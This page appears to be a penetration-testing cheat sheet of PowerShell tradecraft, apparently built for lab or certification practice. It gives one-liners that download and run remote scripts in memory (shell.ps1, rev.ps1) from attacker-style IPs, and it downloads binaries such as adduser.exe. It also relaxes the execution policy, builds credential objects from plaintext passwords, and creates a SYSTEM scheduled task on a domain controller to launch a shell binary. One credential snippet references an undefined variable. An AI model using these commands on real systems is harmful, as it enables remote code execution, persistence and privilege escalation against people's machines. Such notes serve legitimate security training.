Powershell

Windows PowerShell Default Path Location

Tips: If running powershell does not work, sometime it worth trying to access it with the full path. 

 For 64 bits C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
 For 32 bits C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Variation to get Powershell working with RCE

If everything here fail to work, we could probably not use Powershell on the target system. 

powershell <command>
powershell.exe <command>
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe #use the full path
cmd.exe /c powershell <command>
cmd.exe /c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

In a Powershell session

Download a file

(New-Object System.Net.WebClient).Downloadfile('http://192.168.119.190:5555/adduser.exe','adduser.exe')

Download and execute without writing on the disk

IEX (New-Object System.Net.WebClient).DownloadString('http://10.11.0.4/helloworld.ps1')
IEX (IWR http://10.10.10.6/rev.ps1 -UseBasicParsing)

Download a file with Invoke Web Request

Invoke-WebRequest http://10.10.14.2:80/taskkill.exe -OutFile 'taskkill.exe'

# Alias iwr is also accepted
iwr http://10.10.14.2:80/taskkill.exe -OutFile 'taskkill.exe'

Download and execute - Outside of a Powershell session

cmd.exe /c powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.7:5555/shell.ps1')

Set Execution Policy

Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser

Shows environment variables

dir env:

# Alternative to whoami
echo %env:username

Create PSCredential object

Use alternate credentials for any function.

# use an alterate credentials for any function
$password = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('Administrator', $SecPassword)
Get-DomainUser -Credential $Cred

Create a scheduled task as an elevated user

The command below creates the scheduled task named shell that execute the shell_admin.exe binary located to C:\inetpub\wwwroot\shell_admin.exe with the privilege of SYSTEM. The -Credential flag is to be able to create the scheduled task as this command requires command high privileges. 

Invoke-Command -Computer hutchdc -ScriptBlock { schtasks /create /sc onstart /tn shell /tr C:\inetpub\wwwroot\shell_admin.exe /ru SYSTEM } -Credential $Cred

Run the scheduled task as an elevated user

Invoke-Command -Computer hutchdc -ScriptBlock { schtasks /run /tn shell } -Credential $Cred

Create a Remote PowerShell session as an alternate user

PS > $password = ConvertTo-SecureString "Klmcargo2" -AsPlainText -Force
PS > $cred = new-object System.Management.Automation.PSCredential ("INLANEFREIGHT\forend", $password)
PS > Enter-PSSession -ComputerName ACADEMY-EA-DB01 -Credential $cred
PreviousJavaNextC script

Last updated